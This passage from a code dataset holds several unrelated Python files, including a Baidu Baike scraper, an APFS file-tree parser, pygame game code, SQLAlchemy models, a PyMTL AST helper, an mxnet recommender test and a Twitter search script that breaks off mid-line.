content.find('title').string.rstrip(')_百度百科').split('(')\n main_dict['title'] = title_item[0]\n main_dict['item'] = title_item[1] if len(title_item) >= 2 else ''\n #{'title': '曹操', 'newLemmaId': '16191846', 'subLemmaId': '16136678', 'item': '游戏《英雄三国》角色', 'desc': '曹操是一位远程输出型英雄,能够无视敌人的 部分防御,同时拥有强大的远程输出能力。英雄定位: 双修,爆发,后期 远程 老手...', 'lemmaId': '1719', 'lemmaTitle': '曹操'}\n # 主体内容\n wrapper = content.select('div[class=\"content-wrapper\"]')[0]\n wrapper = self.__delWrapper(wrapper)\n\n # 图片、链接处理\n (image_urls, wrapper) = self.__parseWrapper(wrapper, main_dict['lemmaId'])\n\n relates = content.select('div[class=\"polysemant-list polysemant-list-normal\"]')\n relates = self.__parseRelate(relates)\n \n content_file = open(config.content_file, mode='a+', encoding='UTF-8')\n content_file.writelines(wrapper + '\\n')\n content_file.close()\n\n data = BaikeItem()\n data['page'] = str(response.meta['page'])\n data['item'] = main_dict['title']\n data['title'] = main_dict['item']\n data['description'] = main_dict['desc']\n data['mainid'] = main_dict['lemmaId']\n data['subid'] = main_dict['subLemmaId']\n data['newLemmaId'] = main_dict['newLemmaId']\n data['content_wrapper'] = wrapper\n data['tags'] = self.__parseSpan(content.select('span[class=\"taglist\"]'))\n data['sort_order'] = 0\n data['time'] = int(time.time())\n data['images'] = image_urls\n data['relates'] = relates\n yield data\n\n except Exception as e:\n self.parseException(request_url)\n except:\n self.parseException(request_url)\n\n def parseException(self, request_url):\n \"\"\"deal exception\"\"\"\n exc_type, exc_value, exc_traceback = sys.exc_info()\n traceback_details = {\n 'filename': exc_traceback.tb_frame.f_code.co_filename,\n 'lineno': exc_traceback.tb_lineno,\n 'name': exc_traceback.tb_frame.f_code.co_name,\n 'type': exc_type.__name__,\n 'message': exc_value\n }\n print(traceback_details)\n message = 'request_url:%s, message:%s' % (request_url, traceback_details['message'])\n log.msg(message, level=log.ERROR)\n #错误URL\n error_file = open(config.error_file, mode='a+', encoding='UTF-8')\n error_file.writelines(request_url + '\\n')\n error_file.close()\n\n def json_encode(self, items):\n \"\"\" json encode charset \"\"\"\n return json.dumps(items, ensure_ascii=False)\n\n def __parseWrapper(self, wrapper, mainid):\n # 处理图片\n image_urls = []\n for image in wrapper.select('img'):\n attrs = image.attrs\n if ('data-src' in attrs.keys()):\n url = image['data-src']\n elif ('src' in attrs.keys()):\n url = image['src']\n else:\n continue\n\n filename = common.parse_image_url(mainid, url)\n image_urls.append({\n 'filename': filename,\n 'url': url,\n 'mainid': mainid\n })\n image['src'] = filename\n del image['data-src']\n\n # 页面内部\n for item in wrapper.select('div[class=\"lemma-picture text-pic layout-right\"]'):\n item.a['href'] = 'javascript:void(0)'\n del item.img['data-src']\n\n # 右侧\n for item in wrapper.select('div[class=\"summary-pic\"]'):\n item.a['href'] = 'javascript:void(0)'\n del item.img['data-src']\n\n return image_urls, str(wrapper).replace('\\n', '').replace('\\r\\n', '')\n\n def __delWrapper(self, wrapper):\n for item in wrapper.select('div[class=\"album-list\"]'):\n item.decompose()\n\n for item in wrapper.select('div[class=\"mod-detailtable\"]'):\n item.decompose()\n\n for item in wrapper.select('div[class=\"configModuleBanner\"]'):\n item.decompose()\n\n for item in wrapper.find_all('div', id='hotspotmining_s'):\n item.decompose()\n\n for item in wrapper.select('div[class=\"tashuo-bottom\"]'):\n item.decompose()\n\n for item in wrapper.select('div[class=\"tashuo-right\"]'):\n item.decompose()\n\n for item in wrapper.select('div[class=\"lemmaWgt-promotion-vbaike\"]'):\n item.decompose()\n\n for item in wrapper.select('div[class=\"lemmaWgt-sideRecommend\"]'):\n item.decompose()\n\n for item in wrapper.select('div[class=\"zhixin-group js-group\"]'):\n item.decompose()\n\n for item in wrapper.select('div[class=\"lemmaWgt-promotion-slide\"]'):\n item.decompose()\n\n return wrapper\n\n def __parseRelate(self, relates):\n items = []\n for item in relates:\n for li in item.select('li'):\n if (li.a):\n href = urlparse(li.a['href'])\n title = li.a['title']\n items.append({\n 'item': title,\n 'newLemmaId': href.path.split('/')[-1]\n })\n pass\n pass\n pass\n\n return items\n\n def __parseSpan(self, data):\n span_list = []\n for item in data:\n span_list.append(item.text.strip())\n return ','.join(span_list)\n\n def __parseData(self, data):\n temp = data.strip().split(':')\n key = temp[0].strip()\n value = temp[1].strip().strip('\"')\n return key, value\n\n def __getMainDict(select, items):\n '''\n 某些标题中带有逗号,特殊处理\n '''\n items_list = items.split()\n items_dict = {}\n items_list_len = int(len(items_list) / 2)\n for index in range(0, items_list_len):\n index = index * 2\n key = items_list[index].strip().strip(',').strip(':').strip('\"')\n value = items_list[index + 1].strip().strip(',').strip(':').strip('\"')\n items_dict[key] = value\n return items_dict\n","sub_path":"baike/spiders/mdx.py","file_name":"mdx.py","file_ext":"py","file_size_in_byte":8954,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"640624254","text":"import torch\nimport envwrapper\nimport agent\nimport numpy as np\n\ntorch.manual_seed(0)\nnp.random.seed(0)\n\n\nenv = envwrapper.Env(no_graphics=False)\nnA, nS, num_agents = env.return_sizes()\n\nagent_dict={\n \"name\": \"tennis\",\n}\n\na = agent.Agent(agent_dict=agent_dict)\n\na.load_state(enable_cuda=True)\n\na.evaluate(env, delay=0.0)\n","sub_path":"evaluate.py","file_name":"evaluate.py","file_ext":"py","file_size_in_byte":323,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"139465700","text":"#!/usr/bin/env python\n\n\"\"\"\nParse an APFS and print a file tree\n\"\"\"\n\nfrom collections import defaultdict\nimport argparse\nfrom anytree import Node, RenderTree\nfrom kaitaistruct import __version__ as ks_version, KaitaiStream, BytesIO\nimport apfs\n\n\ndef list_extents(extent_entries, node_id):\n \"\"\" Get list of extents for given node_id \"\"\"\n extents = extent_entries[node_id]\n result = []\n for extent_entry in extents:\n result.append({\n \"offset\": extent_entry.key.content.offset,\n \"size\": extent_entry.record.size,\n \"block\": extent_entry.record.block\n })\n return result\n\nclass APFSTree:\n \"\"\" Parse an APFS and print a file tree \"\"\"\n\n apfs = None\n input_file = None\n blocksize = 0\n\n def get_block(self, idx):\n \"\"\" Get data of a single block \"\"\"\n self.input_file.seek(idx * self.blocksize)\n return self.input_file.read(self.blocksize)\n\n def read_block(self, block_num):\n \"\"\" Parse a singe block \"\"\"\n data = self.get_block(block_num)\n if not data:\n return None\n block = self.apfs.Block(\n KaitaiStream(BytesIO(data)), self.apfs, self.apfs)\n return block\n\n def get_entries(self, block):\n \"\"\" Get entries with type name \"\"\"\n name_entries = {}\n extent_entries = defaultdict(list)\n for _, entry in enumerate(block.body.entries):\n if block.header.type_block == self.apfs.BlockType.indexnode:\n # just follow the index blocks\n if block.header.type_content == self.apfs.ContentType.files:\n # we ignore these here as they only give us the IDs of other nodes,\n # but we want the block numbers, which we'll get from the\n # ContentType.location nodes in the else case below\n pass\n elif block.body.type_node == self.apfs.NodeType.fixed:\n newblock = self.read_block(entry.record.block_num)\n entries = self.get_entries(newblock)\n name_entries.update(entries['name'])\n extent_entries.update(entries['extent'])\n else:\n raise \"unexpected\"\n elif entry.key.type_entry.value == self.apfs.EntryType.extent.value:\n extent_entries[entry.key.parent_id].append(entry)\n elif entry.key.type_entry.value == self.apfs.EntryType.name.value:\n name_entries[entry.record.node_id] = entry\n\n return {'name': name_entries, 'extent': extent_entries}\n\n def list_children(self, pid, entries, parent_node, depth=1):\n \"\"\" List children of given pid \"\"\"\n for item_id, name_entry in entries['name'].items():\n\n if name_entry.key.parent_id == pid:\n name = name_entry.key.content.dirname\n extents = list_extents(entries['extent'], item_id)\n if any(extents):\n extent_str = \", extents: %s\" % extents\n else:\n extent_str = \"\"\n node_desc = name\n if self.verbose:\n type_item = str(name_entry.record.type_item).replace(\n \"ItemType.\", \"\")\n node_desc = \"%s (%s, node ID: %d%s)\" % (\n node_desc, type_item, name_entry.record.node_id, extent_str)\n tree_node = Node(node_desc, parent=parent_node)\n self.list_children(item_id, entries, tree_node, depth + 1)\n\n def add_volume(self, volume_block, apfs_tree):\n \"\"\" Add volume dir entries to tree \"\"\"\n\n # get volume superblock\n block = self.read_block(volume_block)\n block_map = block.body.block_map_block # mapping btree\n root_dir_id = block.body.root_dir_id # root dir id\n if self.verbose:\n vol_desc = \"%s (volume, Mapping-Btree: %d, Rootdir-ID: %d\" % (\n block.body.name, block_map, root_dir_id)\n else:\n vol_desc = block.body.name\n\n # get volume btree\n block = self.read_block(block_map)\n\n # get root btree node and parse it with all its children, collecting dir entries\n block = self.read_block(block.body.root)\n entries = self.get_entries(block)\n\n # create a tree from the found dir entries\n vol_node = Node(vol_desc, apfs_tree)\n self.list_children(1, entries, vol_node)\n\n def __init__(self):\n argparser = argparse.ArgumentParser(\n description='Print file tree for apfs images')\n argparser.add_argument(\n \"-v\",\n \"--verbose\",\n help=\"increase output verbosity\",\n action=\"store_true\")\n argparser.add_argument(\"image\", help=\"path to apfs image\")\n\n args = argparser.parse_args()\n self.verbose = args.verbose\n\n with open(args.image, 'rb') as input_file:\n\n self.input_file = input_file\n\n # get blocksize\n self.apfs = apfs.Apfs(KaitaiStream(input_file))\n block = self.apfs.Block(\n KaitaiStream(input_file), self.apfs, self.apfs)\n self.blocksize = block.body.block_size\n\n # get containersuperblock\n containersuperblock = self.read_block(0)\n\n # get list of volume ids\n apfss = containersuperblock.body.volumesuperblock_ids\n block_map = containersuperblock.body.block_map_block\n if args.verbose:\n print(\"Volume IDs: %s, Mapping-Btree: %d\" % (apfss, block_map))\n\n # get root of btree TODO: btree might be larger...\n block = self.read_block(block_map)\n\n # get leaf node\n apfs_locations = {}\n block = self.read_block(block.body.root)\n for _, entry in enumerate(block.body.entries):\n apfs_locations[entry.key.block_id] = entry.record.block_num\n if args.verbose:\n print(\"Volume Blocks:\", apfs_locations, \"\\n\")\n\n apfs_tree = Node(\"apfs\")\n\n for _, volume_block in apfs_locations.items():\n self.add_volume(volume_block, apfs_tree)\n\n for pre, _, node in RenderTree(apfs_tree):\n print(\"%s%s\" % (pre, node.name))\n\n\nif __name__ == \"__main__\":\n APFSTree()\n","sub_path":"parser/apfs_tree.py","file_name":"apfs_tree.py","file_ext":"py","file_size_in_byte":6342,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"388706108","text":"from CoSource import *\nfrom CoGameM import *\n# Render Work here, for local player only\nclass CoRender:\n def __init__(self, screen):\n # tolerate range for objects displayed in sight\n self.tolerateWH = TOLERANCE_RANGE \n self.screen = screen\n self.screenWH = (screen.get_width(),\n screen.get_height())\n self.display_range = (float(self.tolerateWH[0]+self.screenWH[0]/2)/PPM,\n float(self.tolerateWH[1]+self.screenWH[1]/2)/PPM)\n # choose game objects and display them if insight\n self.cur_render_origin = (0,0)\n # encode_data format (pos, encode_data) \n # obj format (pos, img, (ix, iy, w, h), angle, front_back), pos is the center of the image\n def renderProcessor(self, objmultigroups): \n self.screen.fill((0, 0, 0))\n for objgroups in objmultigroups:\n for obj in objgroups:\n # if self.isInSight((obj[0][0]*PPM, obj[0][1]*PPM)):\n # decode and restore the encode_data\n decode_data = decodeRenderInfo(obj[1])\n # drange = (self.shift_len*self.image_idx, 0, self.shift_len, IMAGES[self.myimage].get_height())\n drange = (ENTITY_SHIFT[decode_data[0]]*decode_data[1], 0, ENTITY_SHIFT[decode_data[0]], IMAGES[decode_data[0]].get_height())\n tmp_image = IMAGES[decode_data[0]].subsurface(drange)\n if decode_data[3]: # flip the image if marked\n tmp_image = pygame.transform.flip(tmp_image, True, False)\n # be careful, pygame take ccw as default\n tmp_image = pygame.transform.rotate(tmp_image, 0.0-decode_data[2]) \n self.renderBlit(tmp_image, (self.screenWH[0]/2-\n (self.cur_render_origin[0]\n -obj[0][0])*PPM-tmp_image.get_width()/2,\n self.screenWH[1]/2+(self.cur_render_origin[1]-obj[0][1])*PPM\n -tmp_image.get_height()/2))\n # self.screen.blit(tmp, (obj[0][0]*PPM-tmp.get_width()/2, self.screenWH[1]-(obj[0][1]*PPM+tmp.get_height()/2)))\n def renderBlit(self, image, pos):\n self.screen.blit(image, pos)\n def renderDisplay(self):\n pygame.display.flip()\n def updateRenderOrigin(self, view_center): # in meters, the center of viewpos in phyworld\n if view_center:\n self.cur_render_origin = view_center\n def isInSight(self, entity_pos, view_center): # all in meters\n dx, dy = math.fabs(entity_pos[0]-view_center[0]), math.fabs(entity_pos[1]-view_center[1])\n return dx <= self.display_range[0] and dy <= self.display_range[1]\n # pos should the position of the screen-center\n # def updateRenderOrigin(self, player_pos, mouse_pos): \n # self.cur_render_origin = (VIEW_SCALA*(mouse_pos[0]\n # -self.screenWH[0]/2)+PPM*player_pos[0],\n # VIEW_SCALA*(self.screenWH[1]/2\n # -mouse_pos[1])+PPM*player_pos[1])\n # def isInSight(self, pos): # all in pixels, pos is the center of the image\n # dx, dy = math.fabs(pos[0]-self.cur_render_origin[0]), math.fabs(pos[1]-self.cur_render_origin[1])\n # return dx <= self.display_range[0] and dy <= self.display_range[1]\n def quit(self):\n pass","sub_path":"source/CoRenderM.py","file_name":"CoRenderM.py","file_ext":"py","file_size_in_byte":3426,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"556088319","text":"from database.database import *\nfrom database.student import Student\nfrom sqlalchemy.orm.exc import NoResultFound\nfrom database.event import Event\nimport random\n\n\nclass EventVisitor(Base):\n __tablename__ = 'eventvisitor'\n __table_args__ = {'extend_existing': True}\n\n id = sa.Column(sa.Integer, primary_key=True)\n\n event_id = sa.Column(sa.Integer, sa.ForeignKey('event.id'))\n event = relationship('Event')\n\n student_id = sa.Column(sa.Integer, sa.ForeignKey('student.id'))\n student = relationship('Student')\n\n note = sa.Column(sa.String(256))\n\n @staticmethod\n def add_visitors():\n if len(EventVisitor.get_all_visitors()) > 0:\n return\n else:\n for event in Event.get_all_events():\n s_id_list = random.sample(range(1, 61), random.randint(20, 40))\n for s_id in s_id_list:\n event_visit = EventVisitor(event_id=event.id, student_id=s_id)\n session.add(event_visit)\n\n session.commit()\n\n print(\"visitors added\")\n\n @staticmethod\n def get_all_visitors():\n return [visitor for visitor in session.query(EventVisitor).all()]\n\n @staticmethod\n def add_visitor(event_id, student_id, note=''):\n event_visit = EventVisitor(event_id=event_id, student_id=student_id, note=note)\n session.add(event_visit)\n session.commit()\n return event_visit\n\n @staticmethod\n def get_visitors(event_id):\n return [visitor.student_id for visitor in session.query(EventVisitor).filter(EventVisitor.event_id == event_id)]\n\n @staticmethod\n def get_visitor_by_id(visitor_id):\n return session.query(EventVisitor).filter(EventVisitor.student_id == visitor_id).one()\n\n @staticmethod\n def check_visitor(event_id, student_id):\n try:\n session.query(EventVisitor).filter(EventVisitor.event_id == event_id). \\\n filter(EventVisitor.student_id == student_id).one()\n except NoResultFound:\n return False\n\n @staticmethod\n def delete_visitor(event_id, student_id):\n session.delete(session.query(EventVisitor).filter(EventVisitor.event_id == event_id).\n filter(EventVisitor.student_id == student_id).one())\n session.commit()\n\n @staticmethod\n def get_visitor_students(group_id):\n return session.query(Student, EventVisitor).filter(Student.group_id == group_id).filter(\n EventVisitor.student_id == Student.id).all()\n\n\nBase.metadata.create_all(conn)\n","sub_path":"database/event_visitor.py","file_name":"event_visitor.py","file_ext":"py","file_size_in_byte":2538,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"367664350","text":"#!/usr/bin/python3\nimport os\nimport sys\nimport re\nfrom subprocess import call, Popen, PIPE\nfrom shutil import copy2\n\nWINDOWS_DIR = 'c:\\\\users\\\\reed9\\\\Strawberry\\\\perl\\\\bin'\nUNIX_DIR = ''\n\nos.chdir(os.path.expanduser('~/diss'))\n\ndef run_wordcount():\n FULL_PERL = UNIX_DIR + 'perl'\n command = FULL_PERL + ' scripts/texcount.pl dissertation.tex -inc' \n outfile = 'wordcount.tex'\n with open(outfile, 'w') as file_output:\n proc = call (command.split(), stdout=file_output)\n\ndef calculate_daily_count():\n git_diff = u'git diff @{04:00} -- wordcount.tex'\n pattern = '.Words in text: [0-9]{5}'\n proc1 = Popen(git_diff.split(), stdout=PIPE)\n rv = re.findall(pattern, proc1.communicate()[0].decode())\n return rv\n\ndef main():\n run_wordcount()\n print(calculate_daily_count())\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"scripts/count1.py","file_name":"count1.py","file_ext":"py","file_size_in_byte":815,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"209010242","text":"\"\"\"\n========================================================================\nAstHelper.py\n========================================================================\nThis file collects PyMTL ast visitors.\n\nAuthor : Shunning Jiang\nDate : Jan 17, 2018\n\"\"\"\n\nimport ast\n\n\nclass DetectVarNames( ast.NodeVisitor ):\n\n def __init__( self, upblk ):\n self.upblk = upblk\n self.closure = {}\n for i, var in enumerate( upblk.__code__.co_freevars ):\n try: self.closure[ var ] = upblk.__closure__[i].cell_contents\n except ValueError: pass\n\n # Helper function to get the full name containing \"s\"\n\n def _get_full_name( self, node ):\n\n # We store the name/index linearly, and store the corresponding ast\n # nodes linearly for annotation purpose\n obj_name = []\n nodelist = []\n\n # First strip off all slices\n # s.x[1][2].y[i][3]\n slices = []\n while isinstance( node, ast.Subscript ) and isinstance( node.slice, ast.Slice ):\n lower = node.slice.lower\n upper = node.slice.upper\n # If the slice looks like a[i:i+1] where i is variable, I assume it\n # would access the whole variable\n\n low = up = None\n\n if isinstance( lower, ast.Num ):\n low = node.slice.lower.n\n elif isinstance( lower, ast.Name ):\n x = lower.id\n if x in self.upblk.__globals__:\n low = self.upblk.__globals__[ x ] # TODO check low is int\n elif x in self.closure:\n low = self.closure[ x ]\n\n if isinstance( upper, ast.Num ):\n up = node.slice.upper.n\n elif isinstance( upper, ast.Name ):\n x = upper.id\n if x in self.upblk.__globals__:\n up = self.upblk.__globals__[ x ] # TODO check low is int\n elif x in self.closure:\n up = self.closure[ x ]\n\n if low is not None and up is not None:\n slices.append( slice(low, up) )\n # FIXME\n # else:\n\n nodelist.append( node )\n node = node.value\n\n # s.x[1][2].y[i]\n while True:\n num = []\n while isinstance( node, ast.Subscript ) and \\\n isinstance( node.slice, ast.Index ):\n v = node.slice.value\n n = \"*\"\n\n if isinstance( v, ast.Num ):\n n = v.n\n elif isinstance( v, ast.Name ):\n x = v.id\n if x in self.upblk.__globals__: # Only support global const indexing for now\n n = self.upblk.__globals__[ x ]\n elif x in self.closure:\n n = self.closure[ x ]\n elif isinstance( v, ast.Attribute ): # s.sel, may be constant\n self.visit( v )\n elif isinstance( v, ast.Call ): # int(x)\n for x in v.args:\n self.visit(x)\n\n num.append(n)\n\n nodelist.append( node )\n node = node.value\n\n if isinstance( node, ast.Attribute ):\n obj_name.append( (node.attr, num[::-1]) )\n elif isinstance( node, ast.Name ):\n obj_name.append( (node.id, num[::-1]) )\n elif isinstance( node, ast.Call ): # a.b().c()\n # FIXME?\n return None, None\n else:\n assert isinstance( node, ast.Str ) # filter out line_trace\n return None, None\n\n nodelist.append( node )\n\n if not hasattr( node, \"value\" ):\n break\n node = node.value\n\n if slices:\n assert len(slices) == 1, \"Multiple slices at the end of s.%s in update block %s\" % \\\n ( \".\".join( [ obj_name[i][0] + \"\".join([\"[%s]\" % x for x in obj_name[i][1]]) for i in range(len(obj_name)) ] ) \\\n + \"[%d:%d]\" % (x[0], x[1]), self.upblk.__name__ )\n\n obj_name[0][1].append( slices[0] )\n\n obj_name = obj_name[::-1]\n nodelist = nodelist[::-1]\n return obj_name, nodelist\n\nclass DetectReadsWritesCalls( DetectVarNames ):\n\n def enter( self, node, read, write, calls ):\n self.read = []\n self.write = []\n self.calls = []\n self.visit( node )\n read.extend ( self.read )\n write.extend( self.write )\n calls.extend( self.calls )\n\n def visit_Attribute( self, node ): # s.a.b\n obj_name, nodelist = self._get_full_name( node )\n if not obj_name: return\n\n pair = (obj_name, nodelist)\n\n if isinstance( node.ctx, ast.Load ):\n self.read.append( pair )\n elif isinstance( node.ctx, ast.Store ):\n self.write.append( pair )\n else:\n assert False, type( node.ctx )\n\n def visit_Subscript( self, node ): # s.a.b[0:3] or s.a.b[0]\n obj_name, nodelist = self._get_full_name( node )\n if not obj_name: return\n\n pair = (obj_name, nodelist)\n\n if isinstance( node.ctx, ast.Load ):\n self.read.append( pair )\n elif isinstance( node.ctx, ast.Store ):\n self.write.append( pair )\n else:\n assert False, type( node.ctx )\n\n self.visit( node.slice )\n\n def visit_Call( self, node ):\n obj_name, nodelist = self._get_full_name( node.func )\n if not obj_name: return\n\n self.calls.append( (obj_name, nodelist) )\n\n for x in node.args:\n self.visit( x )\n\nclass DetectMethodCalls( DetectVarNames ):\n\n def enter( self, node, methods ):\n self.methods = []\n self.visit( node )\n methods.extend( self.methods )\n\n def visit_Call( self, node ):\n obj_name = self.get_full_name( node.func )\n if not obj_name: return # to check node.func.id\n\n pair = (obj_name, node)\n\n self.methods.append( pair )\n\n for x in node.args:\n self.visit( x )\n\ndef extract_reads_writes_calls( f, tree, read, write, calls ):\n\n # Traverse the ast to extract variable writes and reads\n # First check and remove @s.update and empty arguments\n assert isinstance(tree, ast.Module)\n tree = tree.body[0]\n assert isinstance(tree, ast.FunctionDef)\n\n for stmt in tree.body:\n DetectReadsWritesCalls( f ).enter( stmt, read, write, calls )\n\ndef get_method_calls( tree, upblk, methods ):\n DetectMethodCalls( upblk ).enter( tree, methods )\n","sub_path":"pymtl3/dsl/AstHelper.py","file_name":"AstHelper.py","file_ext":"py","file_size_in_byte":5779,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"501324809","text":"'''\nCreated on 06/01/2013\n\n@author: \n Victor Rodriguez \n Jimmy Banchon\n'''\n# Importacion de librerias\nimport pygame\nimport Sonido\nimport random, os, sys\n\n#Declaracion de funciones\ndef eleccion(name):\n n = True\n\n pygame.mixer.music.load(name)\n pygame.mixer.music.play(-1)\n while n:\n n_puerta = 0\n n_puerta= input('''\n [1] Puerta 1\n [2] Puerta 2\n Escoja 1 sola puerta: ''')\n \n if (2 >= n_puerta > 0):\n n = False\n pygame.mixer.music.stop()\n \n return n_puerta\n\ndef eleccion_dragon(name):\n n = True\n\n while n:\n n_puerta = 0\n pygame.mixer.music.load(name)\n pygame.mixer.music.play(-1)\n n_puerta= input('''\n [1] Combatir contra el Dragon\n [2] Intentar huir\n Escoja 1 sola puerta: ''')\n \n if (2 >= n_puerta > 0):\n n = False\n pygame.mixer.music.stop()\n \n return n_puerta\n\n# Declaracion del main\n\nif __name__ == \"__main__\":\n\n pygame.mixer.init()\n \n numero = 0\n\n intro = Sonido.Sonido(\"Sounds/intro.wav\")\n \n decision = Sonido.Sonido(\"Sounds/2puertas_mixdown.wav\")\n puerta = Sonido.Sonido(\"Sounds/puerta.wav\")\n #Ramal 1\n guardian = Sonido.Sonido(\"Sounds/pelea_con_guardianes.wav\")\n escaleras = Sonido.Sonido(\"Sounds/escaleras.wav\")\n #decision\n narracion = Sonido.Sonido(\"Sounds/narracion.wav\")\n trampa = Sonido.Sonido(\"Sounds/trampa_mixdown_nuevo.wav\")\n \n #Opcion 2\n dragon = Sonido.Sonido(\"Sounds/pelea_dragon_mixdown.wav\")\n pelea_dragon_ganada = Sonido.Sonido(\"Sounds/pelea_dragon_gana_mixdown.wav\")\n pelea_dragon_muere = Sonido.Sonido(\"Sounds/pelea_dragon_muere_mixdown.wav\")\n caballero_deborado = Sonido.Sonido(\"Sounds/pelea_dragon_muere_mixdown.wav\")\n princesa = Sonido.Sonido(\"Sounds/final_despues_dragon_mixdown.wav\")\n \n #Ramal 2\n normal = Sonido.Sonido(\"Sounds/Normal_1_mixdown.wav\")\n #escaleras\n #decision\n \n #Opcion 1\n troll = Sonido.Sonido(\"Sounds/pelea_troll_mixdown.wav\")\n juego = Sonido.Sonido(\"Sounds/eleccion_juego_mixdown.wav\")\n caballero_pierde_juego = Sonido.Sonido(\"Sounds/eleccion_juego_muerto_mixdown.wav\")\n\n caballero_gana_juego = Sonido.Sonido(\"Sounds/\") \n \n pelea_mago = Sonido.Sonido(\"Sounds/pelea_mago_mixdown.wav\")\n pelea_mago_gana = Sonido.Sonido(\"Sounds/pelea_mago_gana_mixdown.wav\") \n pelea_mago_pierde = Sonido.Sonido(\"Sounds/pelea_mago_muere_mixdown.wav\")\n \n \n #Implementacion -------------------------------------------------------\n intro.reproducir()\n \n os.system(\"cls\")\n decision.reproducir()\n print('Escoja el numero de puerta que sea dirigirse:')\n numero = eleccion(\"Sounds/sonido_espera.wav\")\n puerta.reproducir() \n \n if numero==1:\n guardian.reproducir()\n escaleras.reproducir()\n \n os.system(\"cls\")\n decision.reproducir()\n print('Escoja el numero de puerta que sea dirigirse:')\n numero = eleccion(\"Sounds/sonido_espera.wav\")\n puerta.reproducir() \n \n if(numero==1):\n narracion.reproducir()\n trampa.reproducir()\n sys.exit()\n else:\n dragon.reproducir()\n \n os.system(\"cls\")\n decision.reproducir()\n print('Escoja que accion desea hacer:')\n numero = eleccion_dragon(\"Sounds/sonido_espera.wav\")\n puerta.reproducir() \n \n if(numero == 1):\n aleat = int(random.random())\n \n if(aleat == 1):\n pelea_dragon_ganada.reproducir()\n princesa.reproducir()\n else:\n pelea_dragon_muere.reproducir()\n else:\n caballero_deborado.reproducir()\n sys.exit() \n else:\n normal.reproducir()\n escaleras.reproducir()\n \n os.system(\"cls\")\n decision.reproducir()\n print('Escoja el numero de puerta que sea dirigirse:')\n numero = eleccion(\"Sounds/sonido_espera.wav\")\n puerta.reproducir() \n \n if(numero == 1):\n troll.reproducir()\n juego.reproducir()\n \n aleat = 1 + int(random.random()*5)\n numero = input('Escriba el numero que usted cree que tiene Zagal: ') \n \n if(aleat == numero):\n caballero_gana_juego.reproducir()\n dragon.reproducir()\n \n os.system(\"cls\")\n decision.reproducir()\n print('Escoja que accion desea hacer:')\n numero = eleccion_dragon(\"Sounds/sonido_espera.wav\")\n puerta.reproducir() \n \n if(numero == 1):\n aleat = int(random.random())\n \n if(aleat == 1):\n pelea_dragon_ganada.reproducir()\n princesa.reproducir()\n else:\n pelea_dragon_muere.reproducir()\n else:\n caballero_deborado.reproducir()\n sys.exit()\n else:\n caballero_pierde_juego.reproducir()\n \n else:\n pelea_mago.reproducir()\n \n numero = input('''\n Escoja que accion tomara contra el mago Zagal:\n [1] Rebotarle el hechizo con la espada\n [2] Cubrirse de los hechizos\n ''')\n \n if(numero == 1):\n pelea_mago_gana.reproducir()\n princesa.reproducir()\n else:\n pelea_mago_pierde.reproducir()\n \n sys.exit() ","sub_path":"test/124.py","file_name":"124.py","file_ext":"py","file_size_in_byte":5892,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"139355796","text":"from random import shuffle\n\nclass Aleatoire(object):\n def __init__(self,liste):\n self.taille=len(liste)\n self.liste=liste\n shuffle(liste)\n self.index=0\n\n def __iter__(self):\n return self\n\n def __next__(self):\n if self.index==self.taille:\n raise StopIteration\n else:\n suivant=self.liste[self.index]\n self.index+=1\n return suivant\n \nfor i in Aleatoire([1,2,3,4]):\n print(i,end=\"\")\n","sub_path":"L2/Semestre 3/POO/TD/td8.py","file_name":"td8.py","file_ext":"py","file_size_in_byte":491,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"140623251","text":"import mxnet as mx\nfrom sklearn.metrics import accuracy_score, roc_auc_score, mean_squared_error\nimport pandas as pd\n\ntest_df = pd.read_csv(\"data/test\", sep=\"\\t\")\n\ndef load_mldata_iter(df, batch_size):\n user = mx.nd.array(df['client_id'])\n item = mx.nd.array(df['style_variant_id'])\n score = mx.nd.array(df['response_value'])\n\n return mx.io.NDArrayIter(\n data = {'user':user, 'item':item}, \n label = {'score': score}, \n batch_size = batch_size)\n\ntest_iter = load_mldata_iter(test_df, 2000)\n\n\nmodel_loaded = mx.model.FeedForward.load(\"model/resnet-24-log\", 50)\nresult = model_loaded.predict(test_iter)\n\nprint(test_df[\"response_value\"])[:50]\nprint(\"-------------\")\nprint(result[:50])\n\nacc = accuracy_score(test_df[\"response_value\"].values, result)\nauc = roc_auc_score(test_df[\"response_value\"].values, result)\nrmse = mean_squared_error(test_df[\"response_value\"].values, result) ** 0.5\n\nprint(\"Error: {0: .4f}\".format(1 - acc))\nprint(\"AUC: {0: .4f}\".format(auc))\nprint(\"RMSE: {0: .4f}\".format(auc))\n","sub_path":"recommender/test-mx.py","file_name":"test-mx.py","file_ext":"py","file_size_in_byte":1043,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"606859362","text":"from twitterAccess_code import TwitterAccess\nimport tweepy\nimport time\nfrom pathlib import Path\nimport re\nimport sys\n\n'''\n1. Changing search_tweets.count to change the number of tweets you want to search\nin one page. max = 100\n2. Changing search_tweets.pages to change how many pages the tweets you want to\nsearch. default = 10000\n3. 'q' is the keyword you want to search.\n'''\nkey_num = 0\n\n\ndef find_last_line(file_path):\n with open(file_path, 'rb') as f:\n off = -50\n while True:\n f.seek(off, 2)\n lines = f.readlines()\n if len(lines) >= 2:\n last_line = lines[-1]\n break\n off *= 2\n return last_line\n\n\ndef search_tweets(search_word, key_flag):\n global key_num\n api = TwitterAccess()\n api2 = api.s_access_token(key_flag, key_num)\n # try:\n # search_status = api2.search(search_word, result_type='recent',\n # count=10)\n stop_flag = 0\n tweet_number = 0\n last_id = 0\n last_num = 0\n RT_counter = 0\n path = \"../tweettext.txt\"\n log_path = \"../log.txt\"\n\n check_file = Path(path)\n print(\"finding the file 